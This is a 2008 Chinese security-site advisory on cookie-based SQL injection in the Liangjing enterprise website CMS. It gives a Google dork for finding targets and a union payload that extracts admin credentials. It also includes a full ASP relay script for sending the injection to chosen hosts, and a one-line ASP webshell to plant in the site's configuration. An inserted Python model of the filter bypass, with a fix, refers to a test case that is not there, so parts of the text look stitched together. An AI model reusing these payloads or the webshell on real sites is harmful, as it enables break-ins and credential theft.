Liangjing Enterprise Website Management System 2007-V09 vulnerability - vulnerability warning - Heiba Security Net

2008-07-08T00:00:00
ID MYHACK58:62200819593
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-07-08T00:00:00

Description

Affected version: Liangjing Enterprise Website Management System (2007-V09), official commercial edition. Other versions were not tested but should all be affected.
Vulnerable files: EnProductShow.asp (later versions), Product_Show.asp (earlier version), ProductShow.asp (later versions). They are actually the same code -_-!

Vulnerability description: the variable ID takes a client-supplied value and concatenates it straight into the SQL query. The only protection is the generic anti-injection routine in Check_Sql.asp, which the page includes. The key code is as follows:


CODE:

ID=trim(request("ID"))                  ' request() with no collection name also searches Cookies
if ID="" then
    response.Redirect("EnProduct.asp")
end if
sql="select * from Product where ID=" & ID & ""    ' ID concatenated unquoted into the query
Set rs=Server.CreateObject("ADODB.Recordset")
rs.open sql,conn,1,3
if rs.bof and rs.eof then
    response.write "<SCRIPT language=JavaScript>alert('cannot find this product!');"
    response.write "javascript:history.go(-1)</SCRIPT>"
else
    rs("Hits")=rs("Hits")+1
    rs.update
    ' ... rest of the page (rendering of the product fields) omitted
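A model of this code path, added here as an example (it is not the CMS's code and not Check_Sql.asp): a keyword filter that inspects only the GET and POST collections, the way the advisory says Check_Sql.asp does, next to a page that reads ID with request("ID"). In classic ASP, Request(name) with no collection name searches QueryString, then Form, then Cookies (names are case-insensitive), so a value planted in a cookie reaches the query unfiltered as long as the URL carries no ID. The filter's keyword list is an assumption; the hardened function shows the fix (read one collection, accept only an integer, bind it as a parameter).

```python
"""Why Check_Sql.asp is bypassed by a cookie, and the fix.

Added example, not the CMS's code. Reproduces the behaviour the advisory
describes: a filter over QueryString/Form only, and request("ID") falling
through to Cookies.
"""
import re

# Assumed filter keywords; the real Check_Sql.asp list is not reproduced here.
FILTER_KEYWORDS = ("union", "select", "insert", "update", "delete", "'", "--", ";")

# Payload quoted later in the advisory (26 columns to match the Product table).
PAYLOAD = ("229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,"
           "15,16,17,18,19,20,21,22,23,24,25 from admin")


def check_sql(query_string, form):
    """Check_Sql.asp-style filter: True if no keyword appears in GET or POST data."""
    for collection in (query_string, form):
        for value in collection.values():
            low = value.lower()
            if any(keyword in low for keyword in FILTER_KEYWORDS):
                return False
    return True


def asp_request(name, query_string, form, cookies):
    """request(name) with no collection: QueryString, then Form, then Cookies."""
    for collection in (query_string, form, cookies):
        for key, value in collection.items():
            if key.lower() == name.lower():
                return value
    return ""


def vulnerable_sql(query_string, form, cookies):
    """Reproduces the page: run the filter, then concatenate ID into the query.
    Returns None when the filter blocks the request or ID is empty (the page
    would redirect); otherwise the SQL text that would reach the database."""
    if not check_sql(query_string, form):
        return None
    id_value = asp_request("ID", query_string, form, cookies).strip()
    if id_value == "":
        return None
    return "select * from Product where ID=" + id_value


def hardened_sql(query_string, form, cookies):
    """Fix: read ID only from the intended collection, accept only a bounded
    integer, and pass it as a bound parameter instead of concatenating it."""
    id_value = query_string.get("ID", "").strip()
    if not re.fullmatch(r"[0-9]{1,9}", id_value):
        return None
    return ("select * from Product where ID=?", (int(id_value),))


if __name__ == "__main__":
    # Same payload through three channels: the filter stops GET and POST, not the cookie.
    print("GET   :", vulnerable_sql({"ID": PAYLOAD}, {}, {}))
    print("POST  :", vulnerable_sql({}, {"ID": PAYLOAD}, {}))
    print("Cookie:", vulnerable_sql({}, {}, {"id": PAYLOAD}))
    print("Fixed :", hardened_sql({}, {}, {"id": PAYLOAD}), hardened_sql({"ID": "229"}, {}, {}))
```

Note the fourth case in the test below: when the URL does carry ID=229, QueryString wins the lookup and the cookie is never consulted, which is why the exploit visits the page with no query string.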


Check_Sql.asp filters only GET and POST data and ignores cookies. Because request("ID") is called without naming a collection, classic ASP searches QueryString, then Form, then Cookies, so an id value supplied in a cookie reaches the query unfiltered as long as the URL carries no ID parameter.

Exploitation: find targets with the Google search keyword inurl:"EnProductShow.asp?id=", then use cookie injection. union is supported, and the Product table has 26 fields. Demonstration:

http://localhost/EnProductShow.asp?ID=229
(confirm that the product id exists)

javascript:alert(document.cookie="id="+escape("229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin"))
(run in the browser address bar to set the cookie)

http://localhost/EnProductShow.asp
(request the page with no ID parameter so the cookie value is used)

The union returns the administrator account; the password is an MD5 hash. The back-end address is /admin/login.asp. There are many ways to get a shell from the back end; skipped.

Addendum: Southern Data (南方数据) Enterprise Website Management System ver10.0 has the same vulnerability, and the exploitation method is essentially the same; only the number of fields differs.

/----------xiao.k notes & complements _20080614----------/

I had been analyzing this system myself too, but since tr4c3 had analyzed it long before, there was no need for me to look further. The problem I found is that the union could not alert() the password. My method is to relay the injection through a cookie with a script; the prototype of the script comes from jmdcw.

##################################################

CODE:

<%
ID=request("ID")                          'confirm the id exists! (the injection is passed in here)
JmdcwName=escape(ID)
JmStr="id=" & JmdcwName                   'cookie that carries the payload
url=request("url")
if request("mod")="1" then
    url2="Product_Show.asp"               'early version
else
    url2="ProductShow.asp"                'late version
end if
Url="http://" & url & "/" & url2          'please modify (Url and url are the same variable in VBScript)
JMUrl=url
JmRef=url
JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ"   'session cookie; replace with your own
JmCok=JmCok & ";" & Jmstr & ";"
JmCok=URLEncoding(JmCok)
jmstr=""                                  'POST body left empty: the payload travels only in the cookie
response.write PostData(JMUrl,JmStr,JmCok,JmRef)

'Send a POST with the crafted Cookie header and return the response body as text
Function PostData(PostUrl,PostStr,PostCok,PostRef)
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "POST",PostUrl,False
        .SetRequestHeader "Content-Length",Len(PostStr)
        .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
        .SetRequestHeader "Referer",PostRef
        .SetRequestHeader "Cookie",PostCok
        .Send PostStr
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

'Convert the byte array returned by ResponseBody into a string (double-byte aware)
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

'Percent-encode double-byte characters so they survive in the Cookie header
Function URLEncoding(vstrin)
    strReturn=""
    Dim i
    For i=1 To Len(vstrin)
        ThisChr=Mid(vstrin,i,1)
        if Abs(Asc(ThisChr)) < &HFF Then
            strReturn=strReturn & ThisChr
        Else
            InnerCode=Asc(ThisChr)
            If InnerCode<0 Then
                InnerCode=InnerCode + &H10000
            End If
            Hight1=(InnerCode And &HFF00) \ &H100    'high byte (the original divided by &HFF, which is off for &HFF00)
            Low1=InnerCode And &HFF
            strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End if
    Next
    URLEncoding=strReturn
End Function
%>

##################################################

Save it as cookies.asp. Usage: http://blog.sadk.org/temp/02/cookies.asp?mod=2&url=admin.asp99.cn/ljweb2007&id=80
Note: you still need to add the keywords yourself, and the id must exist. The one-line trojan can be written directly into the configuration: "%><%execute(request("tmd"))%><%Response.End'